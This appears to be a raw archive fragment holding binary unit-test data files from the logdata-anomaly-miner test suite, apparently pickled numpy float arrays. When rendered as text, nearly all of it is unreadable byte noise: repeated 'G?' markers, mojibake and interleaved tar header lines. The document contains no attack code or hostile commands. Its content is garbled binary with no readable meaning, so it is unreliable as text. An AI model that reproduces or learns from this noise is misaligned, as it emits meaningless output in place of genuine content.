G?1TG?!ZLG?Cjw9G?5Jm`|G?E̕G?þpG?;rhG?"G?o_j5G?<3G?kdG?<VG?um4G?VG?=aG?QUzs]G?ZwXG?5+sLoG?5зG?тɏCG?3;'G?TEZ~.uG?%v!G?i\G?UG?uoG?oo4G?;CG?%eG?췦U9dG?ˀ'`G? loUG?;P"7G?z\G?B<G?x/ZG?i>G?Z*;G?9"G?60K%G?G?i$P8G?c:G? =LG?ȁG?]=hG?(i%G?aG?IR G?G?dq;G?) i~zG?0}G?^G?]Sb]G?Jc_G?DkqQG?uSdG?IG?C/G?6#77dG?WHi}G?h'G?U9G?ﻃXG?C_6G?X5G?FhQG?+nG? [[G?E. G?hl!)G?{5G?ݻG?G?9-G? dG?]O`G?CqG??PG?nG?P^G?4\G?ӷG?,~G?:IZG?NZG?TB6G?BΏiG?K7G?٣q1G?P馎)G?$tG?O91|G? :'G?[.G?y9LMkG?nAG?idG?yHd/G?LW-=G?4%SaG?G?OM2G?]G?1\G?%G?p=JG?' ge{G?摁G?-=G?OG?t.G?I;G?q-pG?৔9:G?椩vG?WG?G?_TG?xxG?G?t! G?lG?tMG?p?>vG?wG?F#bG?{(JG?JiG?H\urGG?9G?HGG?( G? }G?mxOnG?:ƻG?  6G?G@=f}G?J<7G?|y+G?CYG?y۷G?SPՒG?MqG? OG?z?ҔG?SfG?G?첦@G?i`+G?yjG? G?#r+G?4cG?enRG?0^i8G?pg>IQG?ttG?4sG?GG? iG?(FBiG?ݷEvG?cG?7 HG?rG?Q\{mG?<;ZG?;DAIG?ܴaG?$;'G?A`dLG?G?QG?%[&G?{bgG?n|ZG?I* G?Ԑ&?G?$ߕޑG?$R}5UG?}G?=hG?Yɤ]G?n:G?Y G? Vvzc}G?v(kg3G?'/OG?xG?喧AsG?x4G?beMF3G?h$G?QG?ze@G?@ɇ\=G?8BG?c^9G?bvG?YψG?qG?,@zG?flEcG?#)N0[G?CGNG?pzG?wgG?00~CG?pGVG?@>tG?> :jG?墁) NG?UG?'EG?2G?悔jG?G??$AG? IC G?m?G?FqG?ݟ*G?lqG?:RG?{YWG?I~G?o Uz G?CG?G?FJkG?VݪG?NG?I1eG?QuzG?`RG?EG?*G?UaG?JS|>G?Hz]6G? G?(G?oi`{G?GyG?iG?ϨUFG?!JI}lG?P~G?lS)pG?m G?'_cG?S3GHG?FA[G?X'G?vdG?G?cNG?Hw͊HG?"KW"G?dG?=mtlG?O\CqG?<~voG?*ۛG?!KG?6,G?OΔG?QG?zC*G?{(G?.k/G?A}G?AaG? x7WG?wG?g0nG?uCTG?_G?K43G?w~cG?؋NG? G?V'6G?x*yG?ꞏG? lG?6c*G?f˒G?'ƘG?g|G? G?禤mG?@rlG?дG?EG?)AG?7QTG?$vG?sG? #Ҽ[G?h)McG?줲B4G?\F^G?DG?4G?e1 -G?kUG?hG?5G?|,G?nɑ G?Ѹ{>G?aG?wlG?Ff1G?㚫rG?(G?V•q G?!A{L!G?G? 
5 G?ReG?BnG?hMG?ԥiC:G?ᄆ~YG?ʀG?텽6G?%gmG?`'G?IlfmG?Hi՗G? G?)G?P}:G?= lG? vEc'G?CIG? u|G?P m~wG?DžG?쓗UG?P:@G?>3zvG?։DG?_X G?TmpG?JI,G?JuG?drs/G?G?V]G?~BUiG?kw;G?hRR)G?sрG?VNG?켛CUGG?LxjG?זּu/G?絙d"/G?FlG?:.G? ZJdG?A:@G?KrG?ޏ;G?!ǷLG?+foG?tYcG?|Z.G?x%GG?U?=G?nQG?di G? G?cG?juG?1G?}G?CXG?裱G? nG?T/G?:æG?*e&G?LdG?惪k G?> |G?"nqG??2=G?` G?"G?xvG?K.G? G?z | G?G?TNG?,@MG?n>,G?BoG?_ځG? y[G?=zgJG?G?hyWG?,{h8G?]B"G? nG?=pG?!xW7G?fhG?sfeG?Jˋ~G?‚G?цG?6iG?vMG?ܬu-G?jUG?^03ƅG?kE]&G?HaG?fEoG? [`G?Fl1CG?Q3oZG?﫦BG?RqRKG?NjP>BoG?H.KG?.~oG?kR`G?Y̝G?JFHG?>=AG?}jG?;\AG?՟]G?/KH,G?YWG?EG8G?^VwG?G?*羽G?<tG?3>ohG?C1G? 9t6G?}0Y[G?]t/G?׺aG?iG?RncG?[uG?Z WG?-_$G?ʄG?oG?oU PG?IJG?PFXVG?SG?͔r)G?@G?~;G?%,4}G?;^OG?pG?'VG?N d?G?GW\C2G?\(G?5=.G?Ds=dG?G?ז:G?w{G?t}G?p xG?S rG?'h>EG?=G /G?E QUG?qBqG?Y MG?k@OG?pF"G?-*G?kBnuG?ㄐ@.G?dZPG?(^NG? M :G?] 8dG?Ǥ1d:G?;\vG?+G?DApG?+G?돦knG?]^|ȪG?~Y]G?U,GQG?.EG?\soG?G?B$zG?izG?CG?甎oFx0G? 2kG?Hx*بG?N}G?놁wG?gʆG?6p\JG?nG?aNxJG?B%[G?K5G?`_hG?2sG?j2G?Lc5G?&yG?񰰵TKG?*⯸G?-.;G?,ňG?mOYG?+UG?=,G?F{ZG?r$+G?l({G?V:G?D0}G?Pk\G?dmODG?)-<(G?xIGG?@h G?UQsG?Y|٪G?咤{[G?QG?Ռ dG?랱G?v>G?/M c3G?SG?rDu6G?[X~G?WDG?5d|gG?4$!G?6r7n+G? !G?ꙧTSG?9밃G?vv"VG?y E.G?G?sNFG?:GOG?ﶳ%vG?PǨĘG?=ZG?GFG?꧖BYG?Rm[G?}G?\cXsG?)S,+G?n\G?A G?-C`G?&]KHG?9 (G?KPzwG?;,fG?F-6G?s ,&yG?G9EG?O3 G?痗FG?^G?~FiG?>eG?v=?G? W.G?G?8 FpyG?a)czG?< cG?ϞHG?f G?#; ?G?2 kCG?ኹG?ǬG?蛱(G?MlG?GerG?Rr XnzG?,tgY5G?RʂS`G?kPG?sUTG?EHG?p.N0G?)gG?{cAG?F-҉!G?7$.[G?I5G?]VG?KnhG? KAG?a0VhG?;mG?약@6&G?0@G?M`VCG?8mG?,t6K/G?O@?RG?(׵G?YSI3wG? D_G?gJoSSG?$A'G?唓G?'G?رG?M[G?ퟦȎG?.4]G?bxtG?g? -G?^fG?G?CG?[푍G?n;G?n"G?#Hm~G?U]OG?0G?u7YG?6*_G?إfzG?x=G?Qo8)7G?Q\\gG?eG?{G?ޅOfG?y3VG?g9XSG?CG?l^\G?"aBlG?giaG?3wtXG?Hu+PG?B`G?|(G?)4k/G?WG?mlG?^G?8EG?䲧0 G? 6;PG?^d4G?R:G?,\G?idSG?9 (G?/ҰG?ڴ۳uG?͵bG?bG?{d""G?eX(G?UG?ο G?q1G?w]EG? IxG?D>S|G?귔+كG?srG?jG?ZG?\a)G?ꒆWG?hIG?1tG?U0G?MzT`.G?@+G?hG?Y?TG?CG?P`SG?X"ckG?n1[G?z~G?" G?An'G?SxG?qa ^G?L^}G?epG?8/RG?{Z]G?}.7zG?kꐔqG?엠pdaVG?v PG?YYG?QcqG?om?-G?ˎ60*G?}V%G?iC G?yàG?P=G?؊G? 
0UG?KIG?49 xG?Nl>G?qgG?!OG?t!TG?þG?gA,G?!G?@G?v|EG?b{]tG?:rIG?䌾dG?ۇ92G?HG?dSKG?Y'G?h6G?-f_G?ZG?wO>G?JlWSHG?4G?cO&WG?!xG?7uG?QqIG?雪|G?vSG?:rG?mbvHiEG?nUG?2G?gG?'+BG?mG?Au6G?鸽FG?qhG?ܙemPuG?BDG?v#d7G?G?us?G?/7ReG?︫0G?&$fG?2R{~G?oԹ)G?@dG?9jG?)xiG?2G?EG?G?:nG?/G?ՎkG? nFG?/AG?!NG?EӏG?a\8G?eHG?<9 FG?[#,G? BVG?cogG?7nXWG? G?ZwG?$:G?]5y G?:|ۗG?Ȫ*7jG?'G?HG?*ѡG? (mCG?ApG?7YG?qۻ{5G?m&G?^yG?噃G?G?kJG?;CVG?pD8mG?bƝ{G? FG?Fu)G?QG?ֆ,;G?O\pG?\heG?p6c8G?b$G?1-G?(&KG?dG?RG?+}G?Bά;G?XUG? TUG?M?l;G?\8(;G?5nG?V_G?GG?B}G?pLf~ԤG?i.#G?Kf(G?#'7}G?-$YG? A7G?d9p"G?!G?"G?-v@G?˂ G?G?GVzG?sG? 1 + G?b]G?"6נG?:DG?ڔ`oLG?>G?]%eASG?옭CnXG?4hCs&G?C:KVG?吮rG?AmoG?CC.qG?u>G?aUG?{eG? 7)-=mG?C/|G?mG?GVIG?[5G?XP G?ʠLG?1ޜxG?tKG?xG?4xG?a*[G?汬;FhG?TWyNG?ҞiG?b8G?\CwG?v(G?yG?V;HG?ӬCGG?PG?jgNjG?MyG?ho"#G?TbG? ;G?裉G?[-G?ja9G?Xy{CG?F~G?{- ۍG?:eG?aJgEG?\G?k[G?)(yG? XrG?OPG?lDDG?Hۦ:G?{u!G?rԶG?ckIG?ޢځoG?,Gvs9G?UG?~]}RG?[*4G?^EG?퀡"tG? ('G?E?G?24pG?U(3;! G?sxKAG? 6MPG?G?_J3G?VIG?ٟr&G?G?BG?`ΨG?DXP+G?NB_ZG?EIG?) G?gۉ>PG?$_gG?^ G?X0YG?.@+G?LgձG?G÷G?ttG?ߞlfƷG?ݔ" RG?%4G?2jG?j03QG?.t^.G?-ArG?`G?)DG?햘AG?-ѕ` G?퉂w8tG?d >WfG?2mxG? G?@ kG?]G?n[kG?gmhG?.yG?X$G?H~G?P=lG?ID!G?CsxG?Axq*G?{pG?KpG?,G?wHcG?LG?v`6G?jIyG?:G?|G?Hkw1G?bwG? )aG?篼W'ѳG?m^G?$IUIG?U|G?0~mG?o~ G?l-jGG?8K1WG? oG?=FG?8G?G?s1G?/(`]G?QKSG?_w+G?{VٓG?T6T?G?f$ʌG?pNfGG? YG?6L 1G? 1`G? Q)G?wDZ0G?襪G?DT@:G?⤉fG?Z&G?W/T4G?ሟXG?ν!G?캩oG?_߷G?+쌫G?QsSbG?O͏G??^G?s1G?G?ESG?0G?fٖǃG?? byG?@s&bG?&/3G?5G?`lbG?a@G?s>G?- ;G?G?J/eG?XLjpG?h% 4G? ͘=hG?}tG?:;GG?(LG?u wYG?[G?_RtG?dB G?rM7G?9#VG?&\G?l/G?F, G?荙)G?0]YG??7 G?c^E G?ipG?FG?uj=A/G?wBG?v>uG?QNG?~JG?{=RPG?볹PG? L@G?(atG?y/wG?֐$G?Ǣ5G?SfG?B{+G?nl(G?5tG?[6G?:RoG?G?RO'G?ݚ'!G?cWG?֒ G?WmyG?'-nG?=u۸G?yRGG?eeZG?`w9G?xG?@!G?CG?Z\lG?fayG?Y*!nG?襼VG?֊G? =:SG?謦PG?)XzG?qUG?buG?nBG?*ާG?Dnl1G?CLR0G?%n}*G?Y4KG?JZ=G?sKG?z?G?b?G?8G?jY/G?sGG?1G?@hG?A&G?'EΘG?6{G?$rjsG?+G?%8G?2bOG?wUG?C}7G?䭤#G?aQEyG?#(owG?'}G?8?G?3YG?GG?-G?Z4G`vG?w\!G?SG?r^xG?|UG?ԛAG?rIG?ˣaG?oӗG?3 G?Yq+vIG?X/ jG?5YPG?^彝QG?XzzG?/ ƲG?.|U-G?݈kG?:G?$[ĩG? 
a/G?LJBG?~¦!G?^sMSG?F,EG?ԵN:G?ʕT#G?q^ԚG?PG?pU?G??TnCZG?0G?G?P YG?hG?jfuG?(G?.ⷹG?zD6G?[?نG?z}G?ہG?[ZG?h(G?G\G?wgG?2G?p ̧%G?puD(G? [ G?-QG?u5G?7(\8G?# \dyHG?`yAG?K+#;G?抠|'G?CIMPG?늊쎿G?;3{G?IIG?彙OH G?*_AsG?C-7D=G?H&G?"W:G?<2yG? 0ցG?Gh[ G?šG?ЀG?[xG?* VwlG?l/PG?.[G?eYG?휃xG?ʳL.G?JS `G?_aG?p?G?m0FG?knM G?ȻmdG?릇,G?+G?`G?{#vG?sqUdqG?4[EG?ݛZEzG?ri]G?쓫NVQG?LQ2G?ڌ G?<*G?UUG?'/G?K<(G?+яG? e](G?T7G?dW _YG?!X/G?.G?dݷG?3I#G?kZ"O 'G?ᆬWG?^gG?(1G?O+G?橷yG?qh(G?-W3>EG?7< nG?}]G?91'G?;j'G?u0ZG?IʄK$G?)dG?ediG?ItnG?ߔlZG?0](xG? pG?, A1,G?zFG?h'? G?ARsG?_G?ІB G?|G? -JG?쾧:G?"52G?VAG?ydG?ٜa.aG?قX}G?.G?P#G?{JH^G?AG? G?ZTG?얿=G?LpG?aLG?&_$tG?O0?:G?F[G?&cG?UG?t1HG?YG?G?pr\G?hr]oG?Sv;G?߫r#G?\lG?F}G?K2\G? G?J5G?,E7G? :sG?0,<#G?S-yG?3;G?X!? DG?G?K$R|G?_G??⛿'G?EG?쾖g6G?'@G?IC G?âG?9]G?tc0LG?OM& G?@ ݶG?G?WyƛG?^G?3BG?ж+9EG?XfG? uG?Zu7G?"#G?RAG?nyG?m3G?;hV2CG?d} G?qG?A4Q"G?셐IG?H~]G?c[qEG?:IfG?{]G?o]G?smG?eHJCQG?r\G?t>]G?:]:G? ?)G?OP G?C G? G?;">G?gG?,w3BG?_3G?:i6G?U!ϕG?v8JG?߮dG?"Z*G?yv3G?.F=EG?]LG?oG?'CڀG?bQG?xdG?)YG?g;.G?6O G?At@G?YWG?ڻ!G?s1G{G?ghG?K\G?1 $7G?*]lG?Q;G?Þ^G?ɟG?lG?fZa?CG?ǵG?2@G?0_j,G?6efG?ZDaG?.dG?c>,G?=G? ]VHG?N 'ORG?,G?8GG?CRG?kɄcG?A~wG?˱;G?/1G?UyG?%G?BLTG?Aa[G?oM'G?}tG?ړ3G?ﻒ?Q#G?c$G?Hܶ栄G?M!G?IhG?$v(G?j0G?YjG?}h(G?{->"G?qN{0G?;|v>G?'G?pj`#G?9! G?+#G?Ζ[G?!G?_ewG?Ө.G?`G?|sG?4>fG?0؎OG?;GwnG?"bYuG?d\G?:"sHeG?줸:{rG?, G?:#G?G?HG?`.G?G?8 G?6FpG?#G?*t!gG?<}UG? i`G?刢G?;g%G?&WG?u#fG? G?c2G?[)G?rcG?첃\yG?yG?,"G?! G?΂G?@AG?TRG?:EG?ã;%Z`G?|{^G?zAȽG?guG? l1G?rtn&G?]JG?7}G?YG?esS,G?cmG?tLG?W*G?JL[G?n!tG??8G?/G?gN!?G?bvIG?89ճG?ؽG?_pH!G?k G?Me'&G?G?ѽG?O}0G?Prbk[G?,'G?2ӔG?ܘN !G?0G?QVG?[ƪ G?qb1G?aG?te~G?<F%(G?+VG?BatG?%ZհG?GSAG?UVb:yG?ȓG?KD~G?1G?"*m dG?8 G?]SG?x97z=G?*]G?9:G?홨¥G? i#bOG?g%rG?2dG?WmI gG?훗6kG?(ťG?)n-jLG?XiڵG?4dG?vEG? Hj;"G?X͍H!G?欲hG?+DHG?_=]G?)/>!G?S&G?+ G?4/G?+o#G?ڲG? *>XJG?<G?*&oG?BcG?YG?֍%RG?H@)̚YG?x G?yb8RG?T/IG?bVG?$%OG?/TG? 'G?iG?B HfG?~G?((FSG?^+G?B8G? 
}G?Jj-G?:^^G?ݾ+G?=wcG?7 ~$):G?XZ)G?Ҁo0ʴG?ͬ$|G?聯G?﬎(eG?JC|G?n1?G?lG?L;aG?gKG?酸8G?=yG?i|&G?QuG?qdtG?Y,sG?轲GM'G?q4\G?߄G?{boG?l߳G?쪲.tG?]@G?/J՞G?ꡪ4G?ߵ613G?QG?TIŨG?_cNG?~G?LtHG?,F!%>G?ήTRRG?'۠G?̿G_ G?e艩G?JcXG? ]klG?[ͧtG?$ǜG?)ٜv-G?땔G?'[G?5 zwG?/M5PKG?(?vG?ǩaG?#r3G?ٳ"G?@_a G?s2MG?ܵe`/G?E%OǻG?拕5cG?أ G?QJiG?%~[G?h뒩G?釄G?B\f'G?k iHRG?xtsG?,|G?cG?}eG?{G?^BG?TG?}ROgG?80aG?[uMG?W/G?~'G?1c#4EG?)G?G?韘G?MRBG?ϣG?!bpG?َ.8G?kx~G?|=G?鼺qUG?gu9 _G?Do}G?-ȱG?G?2n'G?PސoDG?tCG?ĪKG?'RG?j={G?Vzn+G?xHG?A֌G?.S0G?1DG?#gG?J,G?{4qG?II>wG?KpyKG?m {@G?NfRG?vG?fSG?MMsNdG?ҮgZG?ێ8G?{LA}G?ernG?fycG?mX !G?xAG?'G?ZםxG?d1G?bWJG?$G?܊SπG?$UYG?馪KG?{SbhG? gpG?֯TG?:"G?jrXG?aeG?@G?"s`G?_ 'G?Ε 1G?ud$bG?찷 ,{G?鲩,G?|YG?%G?WLG?7S\G?HxG?6SdXG?AfAG?8]] G?E1QG?O{mG?G?DG?3G?Oq BG?/uG?ILG?x$=G?+-2G?ǫ`G?F1G?$ym- G?wG? toG?NG?o|pmG?FP+iG?WCG?ԅ[G?fG? 'G?DG?͖vNCG?UG?ظ[(qG?$4TG?2'SG?G?hȦG?jk'G?5nmG?xO%G?`izG?n` G?DG?dfG?,+GG?g["G?8xpG?G?悱9TG?ir DG?`GMG?rmG?/aG?KbG?)*jf G?`/1kG?7qG?G?ﴮv|&G?EG?l)G?bG?kOG?j0~G?xG?%cHWG?G? aG?sw0y|G?Nr}kG?zz"㧧G?f3G?\HsG?IG?ZG?UG?@:/kG?VϠIG?銦:xG?YS-G? G?NL컴G?ިG?I6j([G?HQG?D(G?/2G?Ԑ:}G?pG?HKG?[G? G?<_iG? h8:G?-G?tL 1G?vG?Ms%G?6G?* G?O3JG?}G?,;G?ڛ G?F4G?ƁLG?O"!^2G?u9zG?B/G?7G?:zGG?8|G??WwG?kҿLG?`f#G?,@!4G?J G?H G?A$G?m G?i&=G?zG?LQpG?XਜG?c7G?V9 G?3`G?*(ѮG?a:G?n f >G??G?5fSG?cfzG?>pG?^@G?%G?2G? fG?]kG?0{tG?@VG?&qG?&'hG?\ 'G?i=G?8DG?|1{G?P\jG? :#1G?|6φG?yc6eG? ))9e](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/nor_data_test3000066400000000000000000000432761500476301700273270ustar00rootroot00000000000000F](](G?©bXG? $GG hOsGGwm0G ;GE%8G(AGp}G@5cG?)Gι$G?2O\zG?75Q6GQy r9NG&l&G?MIGmG G? YG?="G?MSOMG?_"/G?4fpG?ζbGעfǻG@g"6G?tN|LG G΄eG?U¤G@~'G?cz`CqG헎yG_~rG?n4yG?lyXG?/ IG?1jG?K^ G? @[M?G&GD"^G?4 iG?AUSGii+G?IG?34G?.daG?)@G?͝?G?ܫWe6G4*OGqG{AlG?>39bDhG~tK(G? "G?jM)G? 
G +!pG?VZGd[OGGf^VGWkAGѵglv8G?>_yG?=߲G?~GpwkeG?aGp6,G*/G?S[ٚG7۵G?p/ G?륔I ]G?w$HG?ZrAG?q˥sRG" ]GG?]GRPGs>GLGśGPG`PҾGV`G?J\8G?Ay`ފG?{rfeG?<>}G?ȫ5G$FG?HÇi(Gh*PG۔oGSIZG?qwGk (pGW G?|,XYGxGC1G?(BeG%Nt*G?9 5AGvVZ5G=G?6s^bGx5G?0"ghG=C9G?%bG)pEG5EG[tyG?SfrGd%oGPوGƃނG?ZG?ca8uG4Q[G@,G䯟\GGG?->Gk GrΥGFG?$9>G\:3j#G2(CRG7+FhG?JWgG?FGwGm`GYlwG?{UG?+G?ڔG'G?Ge:dG?GKG?vvmGrG?, G22G2SG*~~G?=Ӌ G?[ 9AG?G?iXG| %GkW*;GM g7G?3J2G?Tj@G?C?BG?\I+Gw1ҙG{)}TG0<Gә.;MGjGJG=lG  G?ΉVwx[GzG) G?ʇPV\G?BG#}$o&G?[Gd!EGjFeG?@/G*ԁG݃h&GծG?1s G? dWG^>@fG97yG?˦+'GwG? CHՄG߇*G?,B}G?S G=fG͉Gxj*)GkG?(KmnG?չY`AGX}G3/Glp>(pG?!MnUG?r_GriGt.3GPWT4G\MMjIG@rsG?}GP'G~G?*pG s]G?a?G?u`Gf1CG?ݓ+tjKG[k0G䨂iG[nujG?]ɊG`!fG?:"G?۞G?XG?xnGZ:G?[_vGG?Քit%GӾYGኛTG;Gܿ~0G?t.G?b(G?G?j .QG禗ֲcbG?A.0yG㪂G1 p0AG?b|ljF G?x;G@Sت)YG?zGnD Gn; "G?&rWGܕAG?;yސGL'ljG?:;G?dM@G jmTBSG[9v.G?#ReMG?_|FaG$%?R@G?ňf Gꤌ6 UG?<+G?Keۛ3GzG9IG=G?|p G?HMy;GNyG?1˶G?繈GMG"QA|-GnzG&mG?h6mGr;~LG?2C\QW2G?0 (GG?! G?抎"*G?abWG?ٌGG\>vG?h?pG?`G?ޣtG?N<G? e G G?reN4G֜*mJ-G;Go=G?@jG?hhOG?iPiG?CTG<'G CNG4G)3Hm3G?`GCG@ ~G?[ŇG?G2W*,G?)G?&3G?g,cG+`G%s'G?EXG7 0Gā˅G??fNG?weGbX^ $G?;+`G?BEG?M7GڳG?<+G͢65hG?B6Gۗ"(aG?5~G?yOGP؎ GfCGPȂGR/p G?#G?[+.fG{jlG?rXG?~;h".G?)B Gҗ GHHNG?PyG?.3G?frG?݊ gG?nlinG?ibG?Ջ0|AlGG)bG?yC G?1G?":5ЧG?R}}GKv|G8-GLǡG?yO6LG?WJG7H.G?DnlG?unSEuG?yqG? 9/wNG\rJ+G? XRG?K &1G k,G?DJ`=G?ȹ(G?E$ GD@%*G?P+r$G~G?V=*G?BWG3G?SrXyGo pG?>UB'GG?Y vGR eG?-bG?L)3jGD!kG爵۷G?XInwGۺ܏G?(/G?ja|G]G&_VG?R`(,G?$}ȝ]G?)G^#:]G?G)Q掞G8+:Grh|aGHwKGc%G?OjG?ɋ"|GwGmbmG? G? r/G?B_G&/G$يtGLFHG%rvGOG? h"G?L`G?惽:^UGS G[2brG? `GM!#G'@NE4G?ޢ61WGd+Gũ75Gᒐ <@G*G?0嗴Gv-g G瞫 GB$G?]Y6*sG7KG?5h.G?א;}SOGyFG?\+G?%hӂG _G?JyG?JdG?<CGG?<>vG,vVm`G>+G?Dtm}>G?ع\ˈG?#c$G?MժLG?c| GlY=FG痯iQG?-G`Gs3G?c`o5>G?Eo{PG?+GOG~YiI_GxBmsG?SBNrG?ڷfxEGZ*zGE|TGǻi?@G6[iGcq+G?(G?GG?Ր`|SGՉ@%&qGk329G?v|3G?G?vn 'G?{HG?ع]tGGG.G(mGOZG?CxKG[f!Gx0G?Olj%G?߫9:G?޷]7G?1|#G ;!9G?)TG(?!GzֿEG?ikDG? 
G?30G?,ꭉGnPGP"^GFFr9G?~8G;G3xgG?uu&QG?e^ G恀Glg\GKRG?_qG-.gGkWyG?jCG?bTIGρXqG=8t8G O5G~I20G?`G}AG% G?DŽG?LE^G?-hcG?>ҸG^>GT)ψG<6G@R$GfG?J!G'=÷BGݻ4AGsyG?6вGw83GN)G?yG 8îG?{DG@/G?K@DGlDnG좳ՊG?xD kgG޲=aG dG@'#GŚ,cG_bd#GS G;9kyG?#!j-G{3G?&>@GΊdG?qiqG?MGY@&G@5jG[=G?*s&)G?>)G!&DpnG\G? 8ywGG❆ =G?>/GT+GpcGz߈;G?njG?:/G?|vG?Z@G?xG?찧G|QyGGiG~UrKGuG?3FhG¥VuGfG#*GTmG@5|G%1h|GA[DGt~m1uGq~RG?4]ʼ9GɀXNE G?㜟NG?m7/.G9\PGR Ga8{IG?OGJG?ڰT\@G8qG}RX;G64VG? -fG{n.GBG?ԕ`G?ڊ^ [G?08GG?38G1 a;G? VŽG-<){G?BGG;G?D&wG^p =GܫfG?_PƠGT[G?QȖYGg^G?|P֊G?G?z?6]G?aHGGؤ G{GQkG?DJ!G~GL )G\+G@ sG? qG3YGmAgG?+9G)%G?"_6G2NG? PG7"DjG?NH!GvG?$f_pG.GYe(G?0- G%G? ůGcw[$GYjG*5GG%fNVgG?{¯!KG?|l9G>܅=G?Қj?>/TG+NdGVjGӴmsތG?ȼcЁ Gّ4mIfG eG?%Z>G?qYQGGŝ@o9tGWX(GLdNG?3F%VG?8ܞGZ>G?їcRG|HG?*MG?Z8FG?kG?_G8 EG+4{mG?gVNLkGd4٢G??eG?ĩWG?&UGի(WzG?܋:6[G?i*vS+G?nqG?IUG?!"KG?PۣG?r\>Gvv@Gg[^G?}G?}_"G?@G{ZCA}G?Lʊ`G? =ؐG?` XgG?_fiG?ۘ'"Gx;rXGIY>G?@ʵG?[G?ㄨ1daG?tiHiG?ogN%G?ȱG?IZ9˒G?4K%įGO}$dGr>!GG?ꙡKJG,G? (uBG?oҞEQG?j)KU#G?Y*5]GvG )G7 ~G?\$G/G?[G@qG?&,@G?kW'G?]G󦿥VGR+XG?,fJG?Z^%GT`G?w3GxHQaG?LjF`GUG pGڕ'GGoG?)G?#PaG?殉yG?CqwdGbG?thrGf&M\.G?FGGߙ0WG3)GyG?;uGQSôG;Gv iUG?بi]G?xKG9oG?gG/cG? G@2*G?<"G?;g4G‎G5/G?7NJG?fG?m^SG G }'G??+G?cjN G?繁G?G|!G?CIWG2pߍG" G`gG?СwuG?&Wn9Gف 1GP8]+GEG?G?3:YG?x"cG?Z2y1uG䀨Ԭ6GNyGé6G?ؘb靻G?H%Gv G(8WG?_YHG?%G֛H~G+GljG?x1`G}̔G?t;GVrG?,+~G!G?͛@ϼGd AG?<#$GZծG?f13AG O{G@ZOHG?jGᥥg7G?0qGr"TG?Ԝ؀G"BZG?Q̌/G=wΖuG@N7[hG 7G@5:GyGWuGDG?79Gt M+G? ET(G]G? G?ԏd[G?F~ԈG熋|ŪOG?")"TtG?% G?S8.=vG?-fG?jGѻVyG&G?Ҋ~0kG?%dG?{ G? ٓlG?g%G?yt|EG?)ⶉEG GӚ&VGvqG.'DڸNG.G?8DEG?ѯWG? G?:wSG施F|G?Jz8?G?V4UGO"~G.[GM^zkG?G^lXxG?quGf+)Gȑ{G?;YG?@mGpBG? 4,C4G7.G?o!tG_^b*G?8 z4MG8\X6G?xl9`G?R?3?G? G?s{PGG?G?)lfHG?pK& G?1ȌG 鎒G?;GP* G?k`fG?kG?1hkwU7G9GទzG?߁Ţ9GzG?%zG⿧ 'G? 8G?( GsG?"3˾2G^]XG(GR[GR6G?k RnoLG+e GevG?0G?lC٪ZG[M`hG$INnGzG%^? GDG@3\G!PڿG?1oG&4G?ڭleG?VIPGI2 >G? 
DG7lcG?2^GG?;G?]ؚ=G%(_4G؃; G kGިw€G^I7GKoG?;jG℅5G?qlG?}9@G?CͯG 5GQGjА{G?˙G?ܜѲoG?BG%|G?%eyG?@ +G3ҕGwӏG5G?b,Gْd )"GLդGťG'GF\=G$G?y:R G?$rX)GK1EGvG6=@GP0]Gy"GToZG[n?GUӛG?h~lZG?|GύحGAn~VG?DvMG }dG?fNG?'3G= G}~ok,G?pG?cG?hq)_AG?^GRG?ʢzWG4Q;G?X`GDG?!G?tqG?=a\G]2RG纰'G?8/G?*GT;{)|G?HfG?ňG?COMG`sBG/{`GG?7fGGw"wUWG?|[ Gց},G?;>G?{* G?/ G?iG?Ku#^(G3LFG?UYGMpG?~W@G?jZyG?ҡyG?]+n\Gy|EsG?6pBkGumGa#+/GroGG?4p dG?^mGD߱/MG? G?&ofGd<5&:G? 㜄TG?JG?IG@YM;G<3G?˛G6lnG?ꖊvρGWZ%G?ܣP8&GܨtyG?-G?Mx;G;17G?zG?\GYkGFG?_s(GG?C!nGzK(*Gt W=GҹR>G?qe G?σ“G881G? 4'G?ṢGr ^G?0=VG?;R͡G[5@G̪hG?cbXLG?t0, 7GP.G;z3MGCGuG?x^JG?8qzG?ѵ]G > G?X!G<eGp_vG?B>TGY6G?ҼlGZ'>G? ̇eGR=9G?vG?jG?`%λGP/RG7c*G?_ $GG?$TlG?(zG?mGsd@G?_wG?lpUG?KmdGoW5G2G^?GY8JG?=nGa{u"G{BG?`IGߥsMHGw!iW{^G?">%-MGڔaTG?N@G?o]PG?.}Gۙ-Go5G? 6}e~G?x*/G?e=HG?s:<;G.G?_qCaG?V(˾G⅀MG?"JBG?2eG? GشCf^=GOG?&fG?PX[G?ZG?;+}G?.&z qG& iG?68XyG_PG?LG:GS޻MG?tRG?<.O6GCtG??0eG?/6GKjG3;FeGCG]BG<G!GxWG?0G? G?*8,#,G`._G۳")G? SG?lrG?QϭG?E"Geq!GyG+ͤdG?CeJGfGco0G?_@ёG?+e>G?<9Gk=cG@^u~GwG?Ӳ'Go2G??GeG*FG?CNPG@6qG?KhwG]OSG?88!G@km{GzͫG? G#G?T KG8GcyG߾TG?ݶ3QS|G?*‡/G?P\G?.yG8ߌG?@a&G"f{G?X«/G񊫃 G cjG?d2G? G?MGes;G $Z$G9GV,Vٸ>GA%G?AϢHG?03G?&UPGy~SG-!QG: G?ZCGGG?[G| G?QG0GǴkGK/GG?w5XG?^{GB0QG? bG?x]QG3205G? 
G?kN|sG7fEe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/nor_data_test6000066400000000000000000000046301500476301700273210ustar00rootroot00000000000000]q(cnumpy.core.multiarray scalar qcnumpy dtype qXf8qKKqRq(KXq?Rq@hhC;oL?qAqBRqChhCM~' r?qDqERqFhhCBUQwqGqHRqIhhC(FJ?qJqKRqLhhCy~ @qMqNRqOhhCO_?qPqQRqRhhC3y0'ӿqSqTRqUhhCz?qVqWRqXhhC* 